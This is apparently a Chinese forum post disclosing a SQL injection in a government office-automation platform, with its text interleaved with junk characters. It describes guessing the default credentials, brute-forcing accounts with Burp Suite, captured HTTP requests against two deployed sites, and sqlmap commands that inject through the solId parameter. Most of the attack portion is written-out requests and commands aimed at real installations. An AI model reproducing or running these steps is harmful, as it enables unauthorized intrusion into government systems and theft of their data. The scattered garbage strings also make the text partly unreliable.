|
* O, i) u5 f+ y
5 @5 }7 }- v1 t& V
- {# r1 q3 l0 L7 ^8 Q" z K4 r; ]
. O4 @3 v% k. `7 p3 b 平台简介:! k0 `. K! Y8 X0 l% `# P2 |' W# @
* u, T3 Y! \ m# U+ l- ]: \
/ R' J9 h; _$ K8 v: ~ Q
5 `4 d1 a. H4 I! ~ + c" t3 ?8 [: |& j' ~
( a* A1 r, p/ H! Z, e 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( \9 F3 f6 C/ c: Z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) ^: A; L N5 W同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 J5 H1 D9 X- }! N* w% Y! e
6 B/ L" g* {5 K5 [$ A' M1 z3 F4 h, |# ]+ M
3 i/ Q( M7 \% U7 i ' ^( Q: j7 g0 ]" i8 A
; {3 e( O4 \' k! \7 [9 _ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:" ]2 H8 C3 ]" q4 c
) a/ d3 O& E. q; K# ]2 r' ?( S* E; N2 M" G
9 R( ?- K$ G7 ]/ I5 T
, u2 ^% S% ]5 z A
2 O/ l j" ]* c http://1.1.1.1:7197/cap-aco/#(案例2-)5 {% p2 v7 E+ v6 [. n& Q
" S: z0 S( B: e2 j! v+ F" o' t8 {) `* U
http://www.XXOO.com (案例1-官网网站)
a+ k/ D+ O6 h; Q8 Z* X7 m$ i & U+ f# y) ?8 W. l
/ {6 j ^9 e6 W6 H* G% x9 C" O% \ ; P& k; s8 b2 z7 A5 Y2 o" F1 J9 [
; F% ]- |6 ^# v2 u& Q' U
( e W8 K* s7 [3 M1 W& s 漏洞详情:" ]! F- V( \. l$ X
y. H! O' [5 ^- R; o" E( Y
# K9 _ Q7 Z9 P. p/ Z k 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试9 p% a9 B: w- `0 Q! I1 o" v7 u X5 o! g
, `/ s2 S8 T+ y) G
4 w9 b/ j k6 G3 o( Y
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
& w w5 a- j( D+ z" g& H& N ; g+ T, F; C7 j' ^# J3 V
: {+ o( w1 C3 H# Y& [% v1 r
7 K* d' `# a7 K: m
, O6 q* [. Z, f, B% b; s/ i' p
- z! l4 [1 f' o! s7 q0 [' s4 |  + T; V) h2 f) ?5 i
+ m8 U. C% _$ @7 N2 [& G/ T2 X+ X, M. D: j
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:1 v, t) j T) [' n: e0 S
& E7 F* d; D$ C. d0 t
& k5 @3 T7 F$ f# y8 g0 E 1、案例1-官方网站# Z1 h1 p) z) F' e/ ?2 D
8 F3 {7 ?" F6 D" |
' O& `% Z/ d. V8 {& w; w9 p1 M& V GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1# ~ u; M$ N" Q/ j2 w
2 N: Q+ K% y' v; a9 ^1 C
$ B/ ]' y& ~" B% Y* ~: l
Host: www.XXOO.com
1 |- @8 A" v5 G5 V + {8 S+ W {& W$ d5 J1 `
; r! V. Z5 |3 s- b4 ^9 N Y- G Proxy-Connection: Keep-Alive1 l6 `$ D9 x& x) H7 V
$ y! s) q& j# J$ d( {- ]& |
7 Z; ?3 o5 f4 \, ?3 s8 Z Accept: application/json, text/javascript, */*; q=0.01+ @/ p8 p* i% B3 D) _+ W/ N
% I; U) P' a" C+ e4 u- Q
/ I O2 c& J2 `6 v b9 K Accept-Language: zh-CN
* ], t a; g: h0 X0 H# @
# {1 Y5 K" K! o+ S. L# \: E' N' X
3 ^$ m9 n( m8 G. ?+ x Content-Type: application/json
+ c k" i$ y- c
$ M3 P$ ?8 }% W2 @0 W2 Y
8 I: Q6 ~0 B! v! W/ E, _ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko+ x2 l) p7 u3 c7 n1 {1 ~
+ k( S3 T2 r/ ?& g+ y# C
. o6 c8 p+ n; `4 H X-Requested-With: XMLHttpRequest
8 a6 J$ j* o8 e3 @ n4 Z) O 8 t8 v7 U) R6 S3 m
! m- X6 Y) [3 ^/ L Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002& k" G' ^7 g7 x5 a
& F2 m c4 j+ r) H+ t# |
; }# K5 I/ X. f; y3 E0 c- b2 D
Accept-Encoding: gzip, deflate, sdch
/ d, ^* `: k4 m+ ~% P
! q" |9 m& Q/ b) ~" @7 |9 F% k6 v0 o6 N: A5 ]# a& s* ?0 w
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e' k, ~3 G3 s6 x" t3 C6 j8 k
+ F0 K/ z7 L/ K7 u$ z: |
! g) o& S. O: Q& [ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:7 P' B B* i" m/ L+ u
3 i/ ?/ K# w9 d) k4 ]6 \# Y2 s8 r, ?/ H# z9 t
 2 |- ^9 O/ j# b, o& j
( s# Y/ U1 t0 @% I6 `
9 y7 ~) G1 m! T1 ^/ M 
1 _# W4 m S* O8 x( [& ^
T9 ]8 r( k' E* S& v
/ | z+ e5 v" [3 b6 R3 N5 B' A
. d" u$ @6 _4 f7 z
6 v1 A7 V5 x0 `8 o* e4 |/ t
! C! K: @$ U' Y/ {2 B }6 }
. _' R) K* V# b, {
& B& S8 g5 g' Q6 M2 |
# m5 y! t! f, s/ R" i, F. ?- t1 D* D * L1 k" K& d- q- Q3 k
0 k+ @8 ]# x) r- x2 s' |' g
4 W9 c" L' p1 ^, ~ 2、案例2-某天河云平台# h3 H* j" l' W: l7 I
" T8 `" I1 q) _1 T! j7 v) V$ `
8 U. c' s/ u5 F* F7 { GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
+ c8 c* N8 ` @ 9 T8 [9 `; p7 i5 v( Y) A
4 U0 C, Y5 b; q9 W Host: 1.1.1.:7197: d; r$ [6 d! \6 R7 `
6 }: i) T# V0 o8 d0 Y
, j8 `% l! U$ L6 q2 f0 Y
Accept: application/json, text/javascript, */*; q=0.01
! v( u& n6 d6 X$ M& q4 q" ~ p 8 I2 s2 J8 |' Z- e- P9 w! V) w
. C6 a$ E6 ?" I4 T; l2 X( v X-Requested-With: XMLHttpRequest& P0 W8 y3 s4 j9 z7 p i, d
$ ?: k; L: M7 z& {0 p
n& C( T1 Q; N: O) m8 T& P- P User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0# p& J) m; w" u7 ?1 g" F
1 Y" B7 t& p/ o0 r- c( T8 V, v) _8 n' U& e0 ]7 u$ o
Content-Type: application/json+ E5 y( m0 p a4 K1 M
3 P3 w! V9 w h/ Q: Y4 `( q) l: t7 B, ~' p) ?
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
6 I0 X' C) \% t. Y5 U1 h7 S
8 X N2 ?# U+ R' P. L7 t( g3 _2 H7 [2 ^6 U6 P
Accept-Language: zh-CN,zh;q=0.8
3 M% p: S" N: F8 a6 }+ }5 t ^
1 O+ q8 M0 d- U$ C! c) x2 V0 a3 E
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
1 Z' i/ R/ _1 u, s6 o4 s6 p: z
/ E" `" b& H+ S' N U5 b, [- A2 t6 Z2 N1 c& E- b" D
Connection: close
: {7 V9 p# u/ P. n# S 2 V p) J- k/ G8 j* h
1 Y! m1 s2 ~* I J 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:6 I" s* V2 w( g
6 i. F9 x5 t z) M, {, w7 Q. @" ~1 V$ ?
, V& U$ O% Z( J6 r, \; d
. A) m1 O9 u# X7 q6 X% B; j0 ]9 E4 N# c+ O% ~
' w$ e4 {& ^3 ]2 G5 _9 ~
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对